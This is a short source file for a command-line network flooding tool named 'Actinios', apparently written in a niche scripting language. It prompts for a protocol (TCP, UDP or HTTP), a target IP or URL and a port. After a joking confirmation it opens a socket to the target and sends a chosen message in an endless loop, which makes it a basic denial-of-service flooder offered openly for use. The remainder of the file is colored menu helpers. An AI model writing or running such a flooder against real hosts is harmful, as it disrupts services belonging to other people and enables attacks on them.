use Net;

func main () {
	println("Welcome to Actinios!");
	println();
	println("Please select a protocol:");
	
	protocol = menu(["TCP": "TCP\tTransmission Control Protocol",
			"UDP": "UDP\tUser Datagram Protocol",
			"HTTP": "HTTP\tHyper Text Transfer Protocol"], false);
	
	println("Ok, you've chosen ", protocol);
	println("Now, please choose a target type:");

	targetType = menu(["IP": "IP address\tXXX.XXX.XXX.XXX", 
			"URL": "Website URL\twww.example.com"], false);

	println("Now, choose the target:");
	target = input();
	println("Also choose the port:");
	port = Convert.toInt(input());
	
	println();
	println("So, you wanna flood " + target + " using " + protocol + ". U mad bro?");
	confirm = menu(["Y": "Let it go, let it go",
			"N": "Oh noes"], false);

	if (confirm == "N") {
		Console.backgroundColor = "darkRed";
		println("DAT OPERATION HAZ BEEN CANCELED");
		Console.backgroundColor = "black";
		return;
	}
	
	println("Choose the message to send to the server: ");
	message = input();
	
	println("Operation started");
	
	socket = new Socket(protocol);
	socket.connect(target, port);
	
	println("Socket connected");
	
	while (true) {
		socket.send(message);
		println("Sent");
	}
	socket.close();
	println("Socket closed");
}

func printChoice (color, number, choice) {
	Console.foregroundColor = "white";
	Console.backgroundColor = color;
	print("[", number, "]");
	Console.foregroundColor = "gray";
	Console.backgroundColor = "black";
	println("   ", choice);
}

func menu(items, index) {
	colors = ["darkGreen", "darkYellow", "darkRed", "darkGray", "darkBlue"];
	i = 0;
	foreach([k, choice] in items) {
		Console.foregroundColor = "white";
		Console.backgroundColor = colors[i];
		print("[", i + 1, "]");
		Console.foregroundColor = "gray";
		Console.backgroundColor = "black";
		println("   ", choice);
		i++;
	}
	chNumber = -1;

	while (true) {
		userInput = input();
		try {
			chNumber = Convert.toInt(userInput);
		}
		catch {
			Console.foregroundColor = "red";
			println("Incorrect choice: ", (userInput == "" ? "<empty>" : userInput));
			Console.foregroundColor = "gray";
			continue;
		}
		
		if(!(chNumber.isBetween(1, i, true))) {
			Console.foregroundColor = "red";
			println("Incorrect choice: ", chNumber);
			Console.foregroundColor = "gray";
			continue;
		}
		break;
	}
	if(index)
		return chNumber;
	else
		return items.keys[chNumber - 1];
}
